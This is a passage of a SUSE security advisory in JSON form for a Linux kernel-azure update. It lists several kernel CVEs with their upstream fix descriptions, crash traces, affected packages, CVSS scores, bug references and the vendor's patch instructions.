"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
